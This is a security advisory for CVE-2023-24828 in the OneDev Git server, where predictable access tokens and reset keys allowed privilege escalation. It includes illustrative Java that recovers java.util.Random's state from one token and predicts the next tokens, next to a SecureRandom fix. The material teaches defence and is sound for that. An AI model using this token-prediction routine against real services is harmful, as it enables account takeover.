PT-2023-19809 · Onedev · Onedev

Emilytrau

+1

·

Published

2023-02-07

·

Updated

2023-02-16

·

CVE-2023-24828

CVSS v3.1

8.1

High

Vector AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
Name of the Vulnerable Software and Affected Versions: Onedev versions prior to 7.9.12
Description: Onedev is a self-hosted Git server with CI/CD and Kanban. In versions prior to 7.9.12, access tokens and password reset keys were generated with an algorithm that is not cryptographically secure, so an attacker can predict the values that should be secret. An existing normal user, or anyone at all if self-registration is enabled, can exploit this to escalate privileges and obtain administrator permissions.
Recommendations: Upgrade to version 7.9.12 or later; upgrading is the only fix for this issue. Until the upgrade is applied, restricting self-registration and closely monitoring user activity reduce exposure (they limit the attack to existing accounts and improve the chance of spotting abuse), but they do not remove the weakness in token generation and are not a substitute for the upgrade.
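The description above only states that the token generator was not cryptographically secure. The example below is added here to show concretely what that means in a Java server such as Onedev; it is illustrative code, not Onedev's own implementation, and the exact generator Onedev used is not stated on this page. The weak variant assumed here builds a token from java.util.Random, a 48-bit linear congruential generator whose nextInt() exposes the top 32 bits of its state. Given one issued token, an attacker can brute-force the remaining 16 unknown bits, clone the generator, and compute every token it will issue next (for example another user's password reset key). The hardened variant draws the token from SecureRandom instead.

```java
import java.security.SecureRandom;
import java.util.Random;

// Added example (not Onedev's code): why a non-cryptographic PRNG must never
// back access tokens or password reset keys. The class and method names here
// are hypothetical.
public class TokenPredictability {
    // Constants of java.util.Random's LCG: seed = (seed * MULT + ADD) & MASK
    private static final long MULT = 0x5DEECE66DL;
    private static final long ADD  = 0xBL;
    private static final long MASK = (1L << 48) - 1;

    // Weak: a 128-bit-looking token built from four consecutive nextInt() calls.
    static String weakToken(Random rng) {
        StringBuilder sb = new StringBuilder();
        for (int i = 0; i < 4; i++) sb.append(String.format("%08x", rng.nextInt()));
        return sb.toString();
    }

    // Hardened: 256 bits from a CSPRNG, hex-encoded.
    static String strongToken(SecureRandom rng) {
        byte[] buf = new byte[32];
        rng.nextBytes(buf);
        StringBuilder sb = new StringBuilder();
        for (byte b : buf) sb.append(String.format("%02x", b));
        return sb.toString();
    }

    // Recover the 48-bit state from two consecutive nextInt() outputs. nextInt()
    // returns the top 32 bits of the state, so only the low 16 bits are unknown;
    // try all 65536 candidates and keep the one that produces the second output.
    static long recoverState(int out1, int out2) {
        long hi = (out1 & 0xFFFFFFFFL) << 16;
        for (long lo = 0; lo < (1 << 16); lo++) {
            long s1 = hi | lo;
            long s2 = (s1 * MULT + ADD) & MASK;
            if ((int) (s2 >>> 16) == out2) return s2;   // state right after emitting out2
        }
        throw new IllegalStateException("outputs were not produced by java.util.Random");
    }

    // Build a Random whose internal state equals `state`. Random.setSeed() XORs
    // the supplied seed with MULT before storing it, so undo that here.
    static Random cloneFrom(long state) {
        return new Random(state ^ MULT);
    }

    public static void main(String[] args) {
        Random victim = new Random();              // server-side generator, seed unknown
        String leaked = weakToken(victim);         // one token the attacker was legitimately issued
        int out1 = (int) Long.parseLong(leaked.substring(0, 8), 16);
        int out2 = (int) Long.parseLong(leaked.substring(8, 16), 16);

        Random clone = cloneFrom(recoverState(out1, out2));
        clone.nextInt();                           // skip the two remaining ints of the leaked token
        clone.nextInt();
        String predicted = weakToken(clone);       // the next token the server will hand out
        String actual = weakToken(victim);
        System.out.println("predicted == actual: " + predicted.equals(actual)); // true

        System.out.println("strong token: " + strongToken(new SecureRandom()));
    }
}
```

The attack needs no knowledge of the seed and no timing information: a single observed token is enough, which is why a user who can obtain their own access token can then forge tokens or reset keys belonging to an administrator. The fix is not a longer or more complex token format but a different source of randomness; with SecureRandom there is no recoverable internal state, so observing any number of tokens gives no advantage in guessing the next one.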

Related Identifiers

CVE-2023-24828
GHSA-jf5c-9r77-3j5j

Affected Products

Onedev